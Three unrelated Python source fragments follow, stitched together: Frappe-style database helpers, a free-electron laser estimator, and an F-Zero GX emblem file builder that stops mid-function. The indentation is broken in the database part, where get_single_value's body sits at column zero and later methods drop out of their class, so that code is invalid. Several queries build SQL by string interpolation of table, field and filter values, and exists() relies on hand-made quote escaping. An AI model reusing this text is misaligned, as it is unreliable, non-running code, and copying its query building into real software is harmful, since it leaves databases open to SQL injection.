			if isinstance(value, (list, tuple)):
				_operator = value[0]
				filters[key] = value[1]
				if _operator not in ["=", "!=", ">", ">=", "<", "<=", "like"]:
					_operator = "="
			# "fieldname[default]" syntax wraps the column in ifnull()
			if "[" in key:
				split_key = key.split("[")
				return "ifnull(`" + split_key[0] + "`, " + split_key[1][:-1] + ") " \
					+ _operator + " %(" + key + ")s"
			else:
				return "`" + key + "` " + _operator + " %(" + key + ")s"
		if isinstance(filters, basestring):
			filters = { "name": filters }
		# py2 map over a dict iterates its keys and returns a list
		conditions = map(_build_condition, filters)
		return " and ".join(conditions), filters
	def get(self, doctype, filters=None, as_dict=True):
		"""Return the first record of `doctype` matching `filters`, with
		all fields."""
		return self.get_value(doctype, filters, "*", as_dict=as_dict)
	def get_value(self, doctype, filters=None, fieldname="name", ignore=None, as_dict=False, debug=False):
		"""Get a single / multiple value from a record.
		For Single DocType, let filters be = None"""
		ret = self.get_values(doctype, filters, fieldname, ignore, as_dict, debug)
		# first row only; unwrap to a scalar for a single plain field
		return ((len(ret[0]) > 1 or as_dict) and ret[0] or ret[0][0]) if ret else None
	def get_values(self, doctype, filters=None, fieldname="name", ignore=None, as_dict=False, debug=False, order_by=None, update=None):
		"""Fetch `fieldname` value(s) for records of `doctype` matching
		`filters`; falls back to tabSingles when the table is missing."""
		# a list of names maps to a name -> value dict lookup
		if isinstance(filters, list):
			return self.get_value_for_many_names(doctype, filters, fieldname, debug=debug)
		fields = fieldname
		if fieldname!="*":
			if isinstance(fieldname, basestring):
				fields = [fieldname]
			else:
				fields = fieldname
		if (filters is not None) and (filters!=doctype or doctype=="DocType"):
			try:
				return self.get_values_from_table(fields, filters, doctype, as_dict, debug, order_by, update)
			except Exception, e:
				if ignore and e.args[0] in (1146, 1054):
					# table or column not found, return None
					return None
				elif (not ignore) and e.args[0]==1146:
					# table not found, look in singles
					pass
				else:
					raise
		return self.get_values_from_single(fields, filters, doctype, as_dict, debug, update)
	def get_values_from_single(self, fields, filters, doctype, as_dict=False, debug=False, update=None):
		"""Fetch values of a Single doctype from tabSingles; `filters`
		(when a dict) must match the stored values or [] is returned."""
		# TODO
		# if not frappe.model.meta.is_single(doctype):
		# 	raise frappe.DoesNotExistError("DocType", doctype)
		if fields=="*" or isinstance(filters, dict):
			# check if single doc matches with filters
			values = self.get_singles_dict(doctype)
			if isinstance(filters, dict):
				for key, value in filters.items():
					if values.get(key) != value:
						return []
			if as_dict:
				return values and [values] or []
			if isinstance(fields, list):
				return [map(lambda d: values.get(d), fields)]
		else:
			r = self.sql("""select field, value
				from tabSingles where field in (%s) and doctype=%s""" \
					% (', '.join(['%s'] * len(fields)), '%s'),
					tuple(fields) + (doctype,), as_dict=False, debug=debug)
			if as_dict:
				if r:
					r = frappe._dict(r)
					if update:
						r.update(update)
					return [r]
				else:
					return []
			else:
				return r and [[i[1] for i in r]] or []
	def get_singles_dict(self, doctype):
		"""Return all field/value pairs of a Single doctype as frappe._dict."""
		return frappe._dict(self.sql("""select field, value from
			tabSingles where doctype=%s""", doctype))
def get_single_value(self, doctype, fieldname):
val = self.sql("""select value from
tabSingles where doctype=%s and field=%s""", (doctype, fieldname))
return val[0][0] if val else None
	def get_values_from_table(self, fields, filters, doctype, as_dict, debug, order_by=None, update=None):
		"""Select `fields` from `tab<doctype>` using build_conditions on
		`filters`; `fields` may be "*", or a list mixing column names and
		SQL expressions (detected by "(" or " as ")."""
		fl = []
		if isinstance(fields, (list, tuple)):
			for f in fields:
				if "(" in f or " as " in f: # function
					fl.append(f)
				else:
					fl.append("`" + f + "`")
			fl = ", ".join(fl)
		else:
			fl = fields
			if fields=="*":
				as_dict = True
		conditions, filters = self.build_conditions(filters)
		order_by = ("order by " + order_by) if order_by else ""
		r = self.sql("select %s from `tab%s` where %s %s" % (fl, doctype,
			conditions, order_by), filters, as_dict=as_dict, debug=debug, update=update)
		return r
	def get_value_for_many_names(self, doctype, names, field, debug=False):
		"""Return {name: field_value} for every (non-empty) name in `names`."""
		# py2 filter returns a list; drops empty/None names
		names = filter(None, names)
		if names:
			return dict(self.sql("select name, `%s` from `tab%s` where name in (%s)" \
				% (field, doctype, ", ".join(["%s"]*len(names))), names, debug=debug))
		else:
			return {}
	def set_value(self, dt, dn, field, val, modified=None, modified_by=None):
		"""Set `field` to `val` on document `dn` of doctype `dt` (or in
		tabSingles for a Single doctype), keeping the modified /
		modified_by audit columns in sync."""
		if not modified:
			modified = now()
		if not modified_by:
			modified_by = frappe.session.user
		if dn and dt!=dn:
			self.sql("""update `tab%s` set `%s`=%s, modified=%s, modified_by=%s
				where name=%s""" % (dt, field, "%s", "%s", "%s", "%s"),
				(val, modified, modified_by, dn))
		else:
			if self.sql("select value from tabSingles where field=%s and doctype=%s", (field, dt)):
				self.sql("""update tabSingles set value=%s where field=%s and doctype=%s""",
					(val, field, dt))
			else:
				self.sql("""insert into tabSingles(doctype, field, value)
					values (%s, %s, %s)""", (dt, field, val))
		# recursion terminates on these two audit fields
		if field not in ("modified", "modified_by"):
			self.set_value(dt, dn, "modified", modified)
			self.set_value(dt, dn, "modified_by", modified_by)
def set(self, doc, field, val):
    """Set a field on a loaded document via its own db_set (convenience)."""
    doc.db_set(field, val)
def touch(self, doctype, docname):
    """Update the document's `modified` timestamp to now and return it."""
    from frappe.utils import now
    modified = now()
    frappe.db.sql("""update `tab{doctype}` set `modified`=%s
        where name=%s""".format(doctype=doctype), (modified, docname))
    return modified
def set_global(self, key, val, user='__global'):
    """Set a global default (a default stored under the '__global' parent)."""
    self.set_default(key, val, user)
def get_global(self, key, user='__global'):
    """Get a global default (counterpart of set_global)."""
    return self.get_default(key, user)
def set_default(self, key, val, parent="__default", parenttype=None):
    """Set (replace) a default value under `parent`."""
    import frappe.defaults
    frappe.defaults.set_default(key, val, parent, parenttype)
def add_default(self, key, val, parent="__default", parenttype=None):
    """Append a default value under `parent` (does not replace existing)."""
    import frappe.defaults
    frappe.defaults.add_default(key, val, parent, parenttype)
def get_default(self, key, parent="__default"):
    """get default value

    When the stored default is a list, returns its first element.
    NOTE(review): due to the and-or idiom, a falsy first element makes
    this return the whole list instead -- confirm callers expect that.
    """
    import frappe.defaults
    d = frappe.defaults.get_defaults(parent).get(key)
    return isinstance(d, list) and d[0] or d
def get_defaults_as_list(self, key, parent="__default"):
    """Return the default(s) for `key` as a list.

    NOTE(review): the and-or idiom returns the raw value when the
    single-string wrap is falsy (empty string) -- confirm intended.
    """
    import frappe.defaults
    d = frappe.defaults.get_default(key, parent)
    return isinstance(d, basestring) and [d] or d
def get_defaults(self, key=None, parent="__default"):
    """get all defaults

    With `key`, returns just that default; otherwise the full dict
    of defaults stored under `parent`.
    """
    import frappe.defaults
    if key:
        return frappe.defaults.get_defaults(parent).get(key)
    else:
        return frappe.defaults.get_defaults(parent)
def begin(self):
    """No-op: MySQL autostarts a transaction on the first statement."""
    return # not required
def commit(self):
    """Commit the current transaction and clear rollback observers."""
    self.sql("commit")
    frappe.local.rollback_observers = []
def rollback(self):
    """Roll back the current transaction and notify observers.

    Each registered observer gets its on_rollback() hook called (if it
    has one) so in-memory state can be reverted along with the DB.
    """
    self.sql("rollback")
    for obj in frappe.local.rollback_observers:
        if hasattr(obj, "on_rollback"):
            obj.on_rollback()
    frappe.local.rollback_observers = []
def field_exists(self, dt, fn):
    """Return truthy if DocField `fn` exists on doctype `dt`.

    Bug fix: the parameters were previously bound in the wrong order
    (`dt` was matched against `fieldname` and `fn` against `parent`),
    so the check compared doctype and fieldname crosswise.
    """
    return self.sql("select name from tabDocField where fieldname=%s and parent=%s", (fn, dt))
def table_exists(self, tablename):
    """Return True if `tablename` exists (full `show tables` scan)."""
    return tablename in [d[0] for d in self.sql("show tables")]
def a_row_exists(self, doctype):
    """Return truthy if `tab<doctype>` has at least one row."""
    return self.sql("select name from `tab{doctype}` limit 1".format(doctype=doctype))
def exists(self, dt, dn=None):
    """Return truthy if a record exists.

    :param dt: doctype name, or a filters dict containing a 'doctype'
        key plus equality filters.
    :param dn: document name; for Single doctypes dt == dn.
    :returns: the query result (truthy) when found, True for Singles,
        otherwise an empty result. Returns None on any query error
        (legacy best-effort behavior, kept intentionally).
    """
    if isinstance(dt, basestring):
        if dt!="DocType" and dt==dn:
            return True # single always exists (!)
        try:
            return self.sql('select name from `tab%s` where name=%s' % (dt, '%s'), (dn,))
        except:
            return None
    elif isinstance(dt, dict) and dt.get('doctype'):
        try:
            conditions = []
            for d in dt:
                if d == 'doctype': continue
                # Bug fix: '\"' is identical to '"', so the original
                # replace was a no-op; escape with a real backslash.
                conditions.append('`%s` = "%s"' % (d, dt[d].replace('"', '\\"')))
            return self.sql('select name from `tab%s` where %s' % \
                (dt['doctype'], " and ".join(conditions)))
        except:
            return None
def count(self, dt, filters=None, debug=False):
    """Return the number of rows of `tab<dt>`, optionally filtered.

    `filters` is a dict expanded by build_conditions into a WHERE clause.
    """
    if filters:
        conditions, filters = self.build_conditions(filters)
        return frappe.db.sql("""select count(*)
            from `tab%s` where %s""" % (dt, conditions), filters, debug=debug)[0][0]
    else:
        return frappe.db.sql("""select count(*)
            from `tab%s`""" % (dt,))[0][0]
def get_creation_count(self, doctype, minutes):
    """get count of records created in the last x minutes"""
    from frappe.utils import now_datetime
    from dateutil.relativedelta import relativedelta
    return frappe.db.sql("""select count(name) from `tab{doctype}`
        where creation >= %s""".format(doctype=doctype),
        now_datetime() - relativedelta(minutes=minutes))[0][0]
def get_table_columns(self, doctype):
    """Return the column names of `tab<doctype>` (via DESC)."""
    return [r[0] for r in self.sql("DESC `tab%s`" % doctype)]
def add_index(self, doctype, fields, index_name=None):
    """Create a composite index on `tab<doctype>` if it does not exist.

    :param fields: list of column names; may include an index length
        suffix like "fieldname(10)".
    :param index_name: optional explicit name; defaults to
        "<field>_<field>_index" with any length suffixes stripped.
    """
    if not index_name:
        index_name = "_".join(fields) + "_index"
        # remove index length if present e.g. (10) from index name
        index_name = re.sub(r"\s*\([^)]+\)\s*", r"", index_name)
    if not frappe.db.sql("""show index from `tab%s` where Key_name="%s" """ % (doctype, index_name)):
        # commit first: ALTER TABLE is DDL and implicitly ends the txn
        frappe.db.commit()
        frappe.db.sql("""alter table `tab%s`
            add index `%s`(%s)""" % (doctype, index_name, ", ".join(fields)))
def close(self):
    """Close the cursor and connection, and drop the references."""
    if self._conn:
        self._cursor.close()
        self._conn.close()
        self._cursor = None
        self._conn = None
def escape(self, s):
    """Escape a string for safe embedding in a MySQL query.

    Accepts unicode or utf-8 bytes and always returns unicode
    (Python 2 API: uses `unicode` and MySQLdb.escape_string).
    """
    if isinstance(s, unicode):
        s = (s or "").encode("utf-8")
    return unicode(MySQLdb.escape_string(s), "utf-8")
|
|
"""
Python module for the basis of free-electron laser calculation.
"""
from __future__ import print_function
import numpy as np
import scipy.special as sp
from scipy.optimize import fsolve
class PhysicalConstants(object):
    """Physical constants (SI units).

    :param c0: :math:`c_0`, velocity of light in vacuum, [m/s]
    :param epsilon0: :math:`\epsilon_0`, permittivity in vacuum, [F/m]
    :param mu0: :math:`\mu_0`, permeability in vacuum, [H/m]
    :param e0: :math:`e`, electron charge, [C]
    :param m0: :math:`m_e`, electron mass, [kg]
    :param h0: :math:`h`, Planck constant, [J s]
    :param currentA: :math:`I_A`, Alfven current, [A]
    """
    c0 = 2.99792458E+08
    epsilon0 = 8.854187817620390E-12
    mu0 = np.pi * 4E-7
    e0 = 1.60218E-19
    m0 = 9.10938E-31
    h0 = 6.62607E-34
    currentA = 17045
class HalbachPerm(object):
    """
    Halbach permanent-magnet undulator field model.

    Input parameters:

    :param _a: first Halbach parameter
    :param _b: second Halbach parameter
    :param _c: third Halbach parameter
    :param _lambdau: undulator period length, [mm]
    :param _Bu: undulator magnetic field, [T]
    """

    def __init__(self, _a=3.33, _b=-5.47, _c=1.80, _lambdau=20, _Bu=1.0):
        self.coef1 = _a
        self.coef2 = _b
        self.coef3 = _c
        self.lambdau = _lambdau
        self.Bu = _Bu

    def findGap(self, gap0=10):
        """
        Solve for the undulator gap that yields the target field self.Bu.

        :param gap0: initial gap guess, [mm]
        :return: gap value(s) in [mm] (array returned by fsolve)
        """
        def field_residual(gap):
            # Halbach fit: B = a * exp(b*(g/lu) + c*(g/lu)^2)
            ratio = gap / self.lambdau
            return self.Bu - self.coef1 * np.exp(
                self.coef2 * ratio + self.coef3 * ratio**2)

        return fsolve(field_residual, x0=gap0 * np.ones(np.size(self.Bu)))
class FELcalc(PhysicalConstants):
    """
    Analytical Free-Electron Laser performance estimation using the
    Ming Xie fitting formulae.

    Usage: res = FELcalc(p1, p2, p3, p4, p5, p6, p7, p8, p9, p10)

    :param p1: beamEnergy, [MeV]
    :param p2: relative energy spread
    :param p3: undulator period length, [m]
    :param p4: average beta function, [m]
    :param p5: radiation wavelength, [m]
    :param p6: normalized transverse emittance, [m]
    :param p7: peak current, [A]
    :param p8: bunchCharge [C]
    :param p9: undulatorLength [m]
    :param p10: bunchShape, 'gaussian' or 'flattop'
    :return res: dict, keys: "au", "bu", "gap", "sigmar", "rho1D", "rho3D", "Lg1D", "Lg3D", "Psat", "Pshot", "Pss"
    """
    def __init__(self,
            _beamEnergy=6000.0,
            _relativeEnergySpread=0.0001,
            _unduPeriodLength=0.015,
            _avgBetaFunc=20.0,
            _radWavelength=1.0e-10,
            _normEmittance=0.4e-6,
            _peakCurrent=3500.0,
            _bunchCharge=0.5e-9,
            _undulatorLength=10.0,
            _bunchShape='gaussian',
            _undulatorType='planar'):
        self.beamEnergy = _beamEnergy
        self.relativeEnergySpread = _relativeEnergySpread
        self.unduPeriodLength = _unduPeriodLength
        self.avgBetaFunc = _avgBetaFunc
        self.radWavelength = _radWavelength
        self.normEmittance = _normEmittance
        self.peakCurrent = _peakCurrent
        self.bunchCharge = _bunchCharge
        self.undulatorLength = _undulatorLength
        self.bunchShape = _bunchShape
        self.undulatorType = _undulatorType
        # bunchratio converts charge/current into a bunch duration:
        # sqrt(2*pi) for a gaussian profile, 1 for a flat-top.
        # NOTE(review): any other bunchShape value leaves bunchratio
        # unset and onFELAnalyse() will raise AttributeError -- confirm.
        if self.bunchShape == 'gaussian':
            self.bunchratio = np.sqrt(2.0 * np.pi)
        elif self.bunchShape == 'flattop':
            self.bunchratio = 1.0
    def onFELAnalyse(self):
        """
        Apply M. Xie formulae for FEL analytical estimation
        """
        # Xie Ming Formulae fitted cofs
        a1 = 0.45
        a2 = 0.57
        a3 = 0.55
        a4 = 1.6
        a5 = 3.0
        a6 = 2.0
        a7 = 0.35
        a8 = 2.9
        a9 = 2.4
        a10 = 51.0
        a11 = 0.95
        a12 = 3.0
        a13 = 5.4
        a14 = 0.7
        a15 = 1.9
        a16 = 1140.0
        a17 = 2.2
        a18 = 2.9
        a19 = 3.2
        # Lorentz factor: beam energy [MeV] over electron rest mass (0.511 MeV)
        gamma0 = self.beamEnergy / 0.511
        eta = self.relativeEnergySpread
        lambdau = self.unduPeriodLength
        beta = self.avgBetaFunc
        lambdas = self.radWavelength
        epsilonn = self.normEmittance
        Ipk = self.peakCurrent
        lu = self.undulatorLength
        # rms transverse beam size from the geometric emittance
        sigmaBeam = np.sqrt(beta * epsilonn / gamma0)
        # rms undulator parameter from the resonance condition:
        # lambda_s = lambda_u (1 + au^2) / (2 gamma^2)
        au = np.sqrt(lambdas * 2.0 * gamma0**2.0 / lambdau - 1)
        if self.undulatorType == 'planar':
            # Bessel-function coupling factor [JJ] for planar undulators
            b = au**2.0 / 2.0 / (1 + au**2)
            JJ = sp.jn(0, b) - sp.jn(1, b)
        else: # helical
            JJ = 1.0
        # 1D Pierce parameter
        rho1D = ((1.0 / 2.0 / gamma0)**3.0 * Ipk / self.currentA *
                 (au * JJ * lambdau / 2.0 / np.pi / sigmaBeam)**2)**(1.0 / 3.0)
        # 1D power gain length
        Lg1D = lambdau / 4.0 / np.pi / np.sqrt(3) / rho1D
        # scaled diffraction, emittance and energy-spread parameters
        etad = Lg1D / (4.0 * np.pi * sigmaBeam**2.0 / lambdas)
        etae = Lg1D / beta * 4.0 * np.pi * epsilonn / (gamma0 * lambdas)
        etag = Lg1D / lambdau * 4.0 * np.pi * eta
        # Xie's fitted gain-length degradation factor
        capLambda = a1 * etad ** a2 \
            + a3 * etae ** a4 \
            + a5 * etag ** a6 \
            + a7 * etae ** a8 * etag ** a9 \
            + a10 * etad ** a11 * etag ** a12 \
            + a13 * etad ** a14 * etae ** a15 \
            + a16 * etad ** a17 * etae ** a18 * etag ** a19
        Lg3D = Lg1D * (1.0 + capLambda)
        rho3D = lambdau / 4.0 / np.pi / np.sqrt(3) / Lg3D
        Psat = 1.6 * rho1D * (
            Lg1D / Lg3D)**2.0 * gamma0 * 0.511 * Ipk * 1.0e6 # W
        # update and return calculated parameters
        self.au = au
        if self.undulatorType == 'planar':
            # peak undulator parameter K = sqrt(2) * au for planar devices
            self.K = au * np.sqrt(2.0)
            self.Bu = self.K / 0.934 / (100 * lambdau)
        else: # helical
            self.K = au
            self.Bu = self.K / 0.934 / (100 * lambdau)
        # magnet gap for this field, from the Halbach fit (lambdau in mm)
        self.gu = HalbachPerm(
            _lambdau=lambdau * 1000, _Bu=self.Bu).findGap(gap0=5)
        self.sigmar = sigmaBeam
        self.rho1D = rho1D
        self.rho3D = rho3D
        self.Lg1D = Lg1D
        self.Lg3D = Lg3D
        self.Psat = Psat
        # electrons per radiation wavelength, then shot-noise power
        Nlambda = Ipk * lambdas / self.e0 / self.c0
        Pshot = 3.0 * np.sqrt(
            4.0 * np.pi
        ) * rho1D**2.0 * self.beamEnergy * Ipk / Nlambda / np.sqrt(
            np.log(Nlambda / rho1D)) * 1e6
        # saturation length and steady-state power from shot-noise start-up
        Lsat = Lg3D * self.findSatFactor(Nlambda, Lg3D, lambdau)
        Pss = 1.0 / 9.0 * Pshot * np.exp(Lsat / Lg3D)
        sigmat = self.bunchCharge / Ipk / self.bunchratio # bunch length (rms) for gaussian, full lenth for rectangle
        bandwidth = np.sqrt(3.0 * np.sqrt(3.0) * rho3D * lambdau / lu)
        # Pexit = 1.0/9.0*Pshot*np.exp(Lsat/Lg3D)
        pulseEnergy = self.bunchratio * sigmat * Pss # J
        photonEnergy = self.h0 * self.c0 / self.e0 / lambdas # eV
        Np = pulseEnergy / photonEnergy / self.e0 # photon per pulse
        return {
            "01-au": self.au,
            "02-K": self.K,
            "03-Bu": self.Bu,
            "04-gap": self.gu,
            "05-rho1D": rho1D,
            "06-rho3D": rho3D,
            "07-Lg1D": Lg1D,
            "08-Lg3D": Lg3D,
            "09-Psat": Psat,
            "10-Pshot": Pshot,
            "11-Pss": Pss,
            "12-Lsat": Lsat,
            "13-sigmar": sigmaBeam * 1e6,
            "14-sigmat": sigmat * 1e15,
            "15-bandWidth": bandwidth * 100,
            "16-PhotonEnergy": photonEnergy,
            "17-PulseEnergy": pulseEnergy * 1e6,
            "18-PhotonPerPulse": Np,
        }
    def findSatFactor(self, nl, l3, xlamd, factor0=20):
        """ Calculate saturation length in units of the 3D power gain length.

        :param factor0: initial saturation factor guess (Lsat / Lg3D)
        :param nl: electron count within one unit of FEL wavelength
        :param l3: power gain length (3D)
        :param xlamd: undulator period
        """
        fx = lambda x: 6.0 * np.sqrt(3.0 * np.pi) * nl * l3 * np.sqrt(x) - xlamd * np.exp(x)
        return fsolve(fx, x0=factor0 * np.ones(np.size(self.Lg3D)))
def test1():
    """Single-point FEL calculation demo; prints every result entry."""
    calc = FELcalc(17500, 8.5714e-5, 0.08, 15, 1.3e-9, 1.4e-6, 5000, 1.0e-9,
                   100)
    results = calc.onFELAnalyse()
    for key, val in results.items():
        print(key, '\t=\t', val)
def test2():
    """Energy-scan demo: photons per pulse vs. beam energy.

    Bug fix: the result dict has no 'ppp' key (KeyError at runtime);
    the photons-per-pulse entry is keyed "18-PhotonPerPulse".
    """
    energy = np.linspace(17000, 18000, 3)
    inst = FELcalc(energy, 8.5714e-5, 0.08, 15, 1.3e-9, 1.4e-6, 5000, 1.0e-9,
                   100)
    result = inst.onFELAnalyse()
    print(result['18-PhotonPerPulse'])
def test3():
    """Charge-scan demo: bunch length vs. bunch charge.

    Bug fix: the result dict has no 'sigmat' key (KeyError at runtime);
    the bunch-length entry is keyed "14-sigmat".
    """
    bunchCharge = np.linspace(0.5e-9, 1e-9, 3)
    inst = FELcalc(17500, 8.5714e-5, 0.08, 15, 1.3e-9, 1.4e-6, 5000,
                   bunchCharge, 100)
    result = inst.onFELAnalyse()
    print(result['14-sigmat'])
# Script entry point: run the bunch-charge scan demo by default.
if __name__ == '__main__':
    test3()
|
|
# Requirements:
# - Python version late enough to support argparse (2.7+ or 3.2+)
# - Pillow 2.7+
# - Windows note: may need to install using easy_install instead of pip
# - Linux note: may need to install the libraries for any image
# format(s) you'll use, such as libpng and zlib for PNG
import datetime
import math
import os
import struct
from PIL import Image
# Epoch used by the GameCube/emblem timestamp format.
YEAR_2000 = datetime.datetime(2000, 1, 1)
# Find this script's directory, then navigate from there to the common
# directory, which has some files we need to read.
# This way of specifying the directory is better than '../common' since the
# script's directory doesn't have to be the current working directory.
# http://stackoverflow.com/a/9350788/
script_dir = os.path.dirname(os.path.realpath(__file__))
common_dir = os.path.join(script_dir, os.pardir, 'common')
def short_filename(filename, seconds_since_start_of_2000):
    """Build the in-card emblem filename.

    Named emblems become "fze1-<name>.dat"; unnamed emblems get a
    timestamp-derived hex identifier instead.
    """
    if filename:
        return "fze1-" + filename + ".dat"
    ticks = int(seconds_since_start_of_2000 * 40500000)
    return "fze0200002000{:14X}.dat".format(ticks)
def full_filename(filename):
    """Return the GCI container filename for an emblem short filename."""
    return "8P-GFZE-{}.gci".format(filename)
def checksum(post_checksum_bytes):
    """Return the CRC-16 (X-25 variant: reflected poly 0x8408, init and
    xor-out 0xFFFF) of the payload, packed big-endian into 2 bytes.

    :param post_checksum_bytes: iterable of byte values (bytearray/bytes)
    Fix: `xrange` replaced with `range` -- the header advertises
    Python 3 support and the 8-iteration loop makes them equivalent.
    """
    checksum = 0xFFFF
    generator_polynomial = 0x8408
    for byte_as_number in post_checksum_bytes:
        checksum = checksum ^ byte_as_number
        for i in range(8):
            if checksum & 1 == 1:
                checksum = (checksum >> 1) ^ generator_polynomial
            else:
                checksum = checksum >> 1
    # Flip all the bits
    checksum = checksum ^ 0xFFFF
    return bytearray(struct.pack(">H", checksum))
def setup_header_bytes(emblem_short_filename, seconds_since_start_of_2000):
    """Build the 64-byte GCI header for the emblem file.

    :param emblem_short_filename: in-card filename (ASCII, <= 32 chars)
    :param seconds_since_start_of_2000: timestamp, truncated to int
    Fix: `bytearray("GFZE8P")` / `bytearray(str)` only work on
    Python 2; byte literals and explicit ASCII encoding work on both.
    """
    header_bytes = bytearray()
    # Constant bytes (game + maker code)
    header_bytes += bytearray(b"GFZE8P")
    header_bytes += bytearray([0xFF, 2])
    # Short filename followed by 0 padding until 32 bytes
    header_bytes += bytearray(emblem_short_filename.encode("ascii"))
    header_bytes += bytearray(32 - len(emblem_short_filename))
    # Timestamp
    header_bytes += bytearray(
        struct.pack(">I", int(seconds_since_start_of_2000)))
    # Constant bytes
    header_bytes += bytearray([0, 0, 0, 0x60, 0, 2, 0, 3, 4])
    # Copy count (1 byte)
    header_bytes += bytearray([0])
    # Start block (2 bytes)
    #
    # TODO: Check if there is a better value to use here besides 0.
    # Want to avoid the following error when we try to delete the file from a
    # memcard in Dolphin: "Order of files in the File Directory do not match
    # the block order[.] Right click and export all of the saves, and import
    # the saves to a new memcard"
    header_bytes += bytearray(struct.pack(">H", 0))
    # Constant bytes
    header_bytes += bytearray([0, 3, 0xFF, 0xFF, 0, 0, 0, 4])
    return header_bytes
def setup_more_info_bytes(now, additional_comment):
    """Build the 94-byte 'more info' section (game title + file comment).

    :param now: datetime used for the visible comment timestamp
    :param additional_comment: when truthy, append a third-party notice
    Fix: `bytearray(str)` only works on Python 2; explicit ASCII
    encoding works on both 2 and 3.
    """
    more_info_bytes = bytearray()
    # Constant bytes
    more_info_bytes += bytearray([4, 1])
    # Game title followed by 0 padding until 32 bytes
    more_info_bytes += bytearray(b"F-ZERO GX")
    more_info_bytes += bytearray(32 - len("F-ZERO GX"))
    # File comment followed by 0 padding until 60 bytes
    comment_str = now.strftime("%y/%m/%d %H:%M")
    if additional_comment:
        comment_str += " (Created using third party code)"
    more_info_bytes += bytearray(comment_str.encode("ascii"))
    more_info_bytes += bytearray(60 - len(comment_str))
    return more_info_bytes
def crop_square(img):
    """Return a square crop of `img` anchored at the bottom-right.

    img.size gives a tuple of (width, height).
    Left is inclusive, right is not inclusive; same for upper and lower.

    Bug fix: Image.crop returns a NEW image; the original assigned it to
    a local and discarded it, so callers never got the cropped result.
    The crop box is unchanged; the result is now returned.
    """
    width, height = img.size
    side = min(width, height)
    crop_left = width - side
    crop_upper = height - side
    return img.crop((crop_left, crop_upper, crop_left + side, crop_upper + side))
def emblem(img64_data, alpha_threshold):
    """Encode the 64x64 emblem as big-endian RGB5A1 pixel data.

    Pixels are emitted in 4x4 tiles, left-to-right then top-to-bottom,
    which is the order the emblem data must be stored in.

    :param img64_data: row-major sequence of 4096 (r, g, b, a) tuples
    :param alpha_threshold: pixels below this alpha become transparent
    Fix: `xrange` replaced with `range` (Python 3 compatibility; the
    header advertises 2.7+/3.2+ support).
    """
    emblem_pixel_bytes = bytearray()
    for block_row in range(16):
        for block_col in range(16):
            for pixel_row in range(4):
                # Get the corresponding pixels in the 64x64 emblem, which just
                # goes row by row.
                first_i = block_row*64*4 + pixel_row*64 + block_col*4
                pixel_data = [img64_data[i] for i in range(first_i, first_i+4)]
                for rgba in pixel_data:
                    if rgba[3] >= alpha_threshold:
                        # 8 bits -> 5 bits per channel, 1-bit alpha on top
                        red = int(math.floor(rgba[0] / 8.0))
                        green = int(math.floor(rgba[1] / 8.0))
                        blue = int(math.floor(rgba[2] / 8.0))
                        alpha = 1
                        value = 32768*alpha + 1024*red + 32*green + blue
                    else:
                        value = 0
                    emblem_pixel_bytes += bytearray(struct.pack(">H", value))
    return emblem_pixel_bytes
def banner(img32, alpha_threshold):
    """Build the 96x32 banner: stock left 2/3rds + 32x32 emblem preview.

    emblem_banner_base is a pre-existing file that contains the left 2/3rds
    of an F-Zero GX emblem file's banner, in the same pixel format as any
    emblem file. (The left 2/3rds of the banner are the same for
    every emblem.)

    Fixes: `xrange` -> `range` (Python 3 compatibility) and the banner
    base file is now closed via a context manager instead of leaking.
    """
    banner_bytes = bytearray()
    img32_data = img32.getdata()
    with open(os.path.join(common_dir, 'emblem_banner_base'), 'rb') as banner_base_file:
        # We now have the banner with blank pixels in the emblem preview. Now
        # we'll fill in that emblem preview.
        for block_row in range(8):
            # Stock left portion for this row of 4x4 tiles.
            banner_bytes += banner_base_file.read(0x200)
            for block_col in range(8):
                for pixel_row in range(4):
                    # Get the corresponding pixels in the 32x32 emblem version.
                    first_i = block_row*32*4 + pixel_row*32 + block_col*4
                    pixel_data = [img32_data[i] for i in range(first_i, first_i+4)]
                    for rgba in pixel_data:
                        if rgba[3] >= alpha_threshold:
                            red = int(math.floor(rgba[0] / 8.0))
                            green = int(math.floor(rgba[1] / 8.0))
                            blue = int(math.floor(rgba[2] / 8.0))
                            alpha = 1
                            value = 32768*alpha + 1024*red + 32*green + blue
                        else:
                            value = 0
                        banner_bytes += bytearray(struct.pack(">H", value))
    return banner_bytes
def icon():
    """Return the raw 32x32 icon pixel data.

    emblem_icon is a pre-existing file that contains an F-Zero GX
    emblem file's icon, in the same pixel format as any emblem file.
    (The icon is the same for every emblem.)

    Fix: the file handle was previously leaked; a context manager
    closes it promptly.
    """
    with open(os.path.join(common_dir, 'emblem_icon'), 'rb') as icon_file:
        return icon_file.read()
def edge_options(img, edge_option):
    """Scale `img` to 64x64 using the requested edge treatment.

    :param edge_option: 'resize62' (resize + 1px transparent border),
        'crop' (resize then blank the outermost pixels), or 'resize64'.
    :raises ValueError: on an unknown option (previously this fell
        through to a NameError on `img64`).
    Image.LANCZOS constant requires Pillow 2.7 or higher.
    """
    if edge_option == 'resize62':
        # Resize to 62x62, then paste into the middle of an empty 64x64 image.
        img62 = img.resize((62, 62), Image.LANCZOS)
        img64 = Image.new("RGBA", (64, 64), (0, 0, 0, 0))
        img64.paste(img62, box=(1, 1))
    elif edge_option == 'crop':
        # Resize to 64x64 and replace the edges with empty pixels.
        img64 = img.resize((64, 64), Image.LANCZOS)
        for i in range(64):
            img64.putpixel((0, i), (0, 0, 0, 0))
            img64.putpixel((63, i), (0, 0, 0, 0))
            img64.putpixel((i, 0), (0, 0, 0, 0))
            img64.putpixel((i, 63), (0, 0, 0, 0))
    elif edge_option == 'resize64':
        # Resize to 64x64.
        img64 = img.resize((64, 64), Image.LANCZOS)
    else:
        raise ValueError("Unknown edge option: {}".format(edge_option))
    return img64
def seconds_since_2000(now):
    """Return the (possibly fractional) seconds elapsed since 2000-01-01."""
    elapsed = now - YEAR_2000
    return elapsed.total_seconds()
def image(image_filename):
    """Open `image_filename`, convert to RGBA, and square-crop it.

    crop_square historically returned None (it discarded its result);
    fall back to the uncropped image in that case so this function
    works with either version of the helper.
    """
    img = Image.open(image_filename).convert(mode="RGBA")
    cropped = crop_square(img)
    return cropped if cropped is not None else img
def emblem_maker(args):
    """Build a complete .gci emblem file from the parsed CLI arguments.

    Reads args.image_filename, renders the 64x64 emblem, the 96x32
    banner and the stock icon, then writes header + checksum + payload
    to the derived .gci filename in the working directory.
    """
    now = datetime.datetime.now()
    seconds_since_start_of_2000 = seconds_since_2000(now)
    alpha_threshold = args.alpha_threshold
    icon_bytes = icon()
    emblem_short_filename = short_filename(args.emblem_filename, seconds_since_start_of_2000)
    emblem_full_filename = full_filename(emblem_short_filename)
